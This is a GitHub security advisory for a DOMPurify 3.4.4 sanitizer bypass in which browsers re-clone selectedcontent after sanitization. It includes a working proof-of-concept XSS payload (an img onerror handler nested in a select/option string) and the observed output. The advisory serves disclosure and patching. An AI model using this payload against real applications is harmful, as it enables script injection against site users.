GHSA-87xg-pxx2-7hvx

Suggest an improvement
Source
https://github.com/advisories/GHSA-87xg-pxx2-7hvx
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-87xg-pxx2-7hvx/GHSA-87xg-pxx2-7hvx.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-87xg-pxx2-7hvx
Aliases
Published
2026-06-01T14:07:29Z
Modified
2026-06-01T14:26:26Z
Severity
  • 8.2 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N CVSS Calculator
Summary
DOMPurify XSS via selectedcontent re-clone
Details

Summary

DOMPurify 3.4.4 allows selectedcontent by default, allowing a chain in which browsers "re-clone" an XSS payload after sanitization, effectively bypassing DOMPurify.

Details

The chain is as follows:

  1. The browser parses the input and creates a <selectedcontent> clone from the selected <option>
  2. DOMPurify walks and sanitizes that generated clone.
  3. DOMPurify reaches the original <option> and removes selected=javascript:1
  4. The browser refreshes the <selectedcontent> clone from the original option's content.
  5. The refreshed clone is in a subtree DOMPurify already walked, which DOMPurify doesn't go back to sanitize
  6. The returned string contains unsanitized markup inside <selectedcontent>.

PoC

const dirty =
  '<select><button><selectedcontent></selectedcontent></button>' +
  '<option selected=javascript:1>' +
  '<img src=x onerror=alert(1)>x' +
  '</option></select>';

const clean = DOMPurify.sanitize(dirty);
console.log(clean);

document.body.innerHTML = clean;

Observed "sanitized" output in Chromium 148/WebKit 625:

<select><button><selectedcontent><img src="x" onerror="alert(1)">x</selectedcontent></button><option><img src="x">x</option></select>

After reinsertion, the browser updates the live DOM and strips the handler from the displayed clone, but the onerror has already fired:

<select><button><selectedcontent><img src="x">x</selectedcontent></button><option><img src="x">x</option></select>

Reproduced in Chromium and WebKit, but not Safari (not yet latest WebKit) or Firefox. Will likely change with browser support for selectedcontent.

Impact

This is a default-configuration DOMPurify sanitizer bypass resulting in XSS.

Applications are impacted if they sanitize attacker-controlled HTML with DOMPurify 3.4.4 using the string-input path and then insert the returned string into the page, for example with innerHTML.

Database specific
{
    "cwe_ids":  [
        "CWE-79"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-06-01T14:07:29Z",
    "nvd_published_at":  null,
    "severity":  "HIGH"
}
References

Affected packages

npm / dompurify

Package

Affected ranges

Type
SEMVER
Events
Introduced
3.4.4
Fixed
3.4.5

Affected versions

3.*
3.4.4

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-87xg-pxx2-7hvx/GHSA-87xg-pxx2-7hvx.json"